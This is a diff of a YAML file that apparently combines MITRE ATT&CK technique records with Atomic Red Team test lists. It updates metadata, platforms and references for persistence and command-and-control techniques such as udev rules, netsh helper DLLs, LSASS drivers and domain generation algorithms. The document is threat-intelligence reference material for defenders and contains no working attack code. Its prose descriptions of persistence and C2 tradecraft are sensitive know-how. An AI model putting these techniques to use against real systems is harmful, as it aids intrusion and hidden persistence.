         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -36063,12 +36440,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -36108,8 +36484,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -36117,13 +36495,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -36154,9 +36532,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests:
     - name: Azure Persistence Automation Runbook Created or Modified
@@ -36240,10 +36615,10 @@ persistence:
           terraform destroy -auto-approve
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -36306,7 +36681,7 @@ persistence:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -36340,8 +36715,8 @@ persistence:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -36350,6 +36725,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -36362,12 +36741,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -36380,6 +36758,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -36416,17 +36795,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -36472,9 +36851,65 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+    atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.007:
     technique:
@@ -36511,7 +36946,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -36535,51 +36970,11 @@ persistence:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests: []
   T1505.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Carlos Borges, @huntingneo, CIP
-      - Lucas da Silva Pereira, @vulcanunsec, CIP
-      - Kaspersky
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
-      type: attack-pattern
-      created: '2019-12-12T14:59:58.168Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.001
-        url: https://attack.mitre.org/techniques/T1505/001
-      - source_name: NetSPI Startup Stored Procedures
-        url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
-        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
-          SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
-      - source_name: Kaspersky MSSQL Aug 2019
-        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
-        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
-          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
-      - source_name: Microsoft xp_cmdshell 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
-        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
-          September 9, 2019.
-      - source_name: Microsoft CLR Integration 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
-        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
-          Retrieved July 8, 2019.
-      - source_name: NetSPI SQL Server CLR
-        url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
-        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
-          Retrieved July 8, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-15T16:05:24.007Z'
       name: SQL Stored Procedures
       description: "Adversaries may abuse SQL stored procedures to establish persistent
         access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -36602,20 +36997,57 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Carlos Borges, @huntingneo, CIP
+      - Lucas da Silva Pereira, @vulcanunsec, CIP
+      - Kaspersky
+      x_mitre_deprecated: false
       x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
         NetSPI Startup Stored Procedures) Consider enabling audit features that can
         log malicious startup activities.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+      created: '2019-12-12T14:59:58.168Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/001
+        external_id: T1505.001
+      - source_name: Microsoft CLR Integration 2017
+        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+          Retrieved July 8, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+      - source_name: Microsoft xp_cmdshell 2017
+        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+          September 9, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+      - source_name: Kaspersky MSSQL Aug 2019
+        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+      - source_name: NetSPI Startup Stored Procedures
+        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+          SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+          2024.'
+        url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+      - source_name: NetSPI SQL Server CLR
+        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+          Retrieved September 12, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.004:
     technique:
@@ -36645,7 +37077,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -36669,12 +37101,10 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -36758,11 +37188,10 @@ persistence:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -36814,9 +37243,8 @@ persistence:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1574.012:
@@ -36865,7 +37293,7 @@ persistence:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -36903,14 +37331,12 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 command-and-control:
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -36973,7 +37399,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.001:
     technique:
@@ -37031,97 +37456,95 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1132.001
     atomic_tests: []
   T1568.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T15:55:16.111Z'
+      name: Domain Generation Algorithms
+      description: |-
+        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
       x_mitre_contributors:
       - Ryan Benson, Exabeam
       - Barry Shteiman, Exabeam
       - Sylvain Gil, Exabeam
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
       type: attack-pattern
+      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
       created: '2020-03-10T17:44:59.787Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1568.002
         url: https://attack.mitre.org/techniques/T1568/002
-      - source_name: Cybereason Dissecting DGAs
-        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
-        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
-          Eight Real World DGA Variants. Retrieved February 18, 2019.'
-      - source_name: Cisco Umbrella DGA
-        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
-        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
-          Why so effective?. Retrieved February 18, 2019.
-      - source_name: Unit 42 DGA Feb 2019
-        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
-        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
-          Generation Algorithms (DGA). Retrieved February 19, 2019.'
-      - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+        external_id: T1568.002
+      - source_name: Elastic Predicting DGA
+        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+          Networks. Retrieved April 26, 2019.
+        url: https://arxiv.org/pdf/1611.00791.pdf
+      - source_name: Talos CCleanup 2017
         description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
           Number of Machines at Risk. Retrieved March 9, 2018.'
-        source_name: Talos CCleanup 2017
-      - source_name: Akamai DGA Mitigation
-        url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
-        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
-          Domain Generation Algorithms. Retrieved February 18, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+        url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+      - source_name: Pace University Detecting DGA May 2017
+        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+          April 26, 2019.
+        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+      - source_name: FireEye POSHSPY April 2017
         description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
           WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
-        source_name: FireEye POSHSPY April 2017
+        url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
       - source_name: ESET Sednit 2017 Activity
-        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
         description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
           the Year. Retrieved February 18, 2019.'
+        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
       - source_name: Data Driven Security DGA
-        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      - source_name: Pace University Detecting DGA May 2017
-        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
-        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
-          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
-          April 26, 2019.
-      - source_name: Elastic Predicting DGA
-        url: https://arxiv.org/pdf/1611.00791.pdf
-        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
-          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
-          Networks. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Domain Generation Algorithms
-      description: |-
-        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
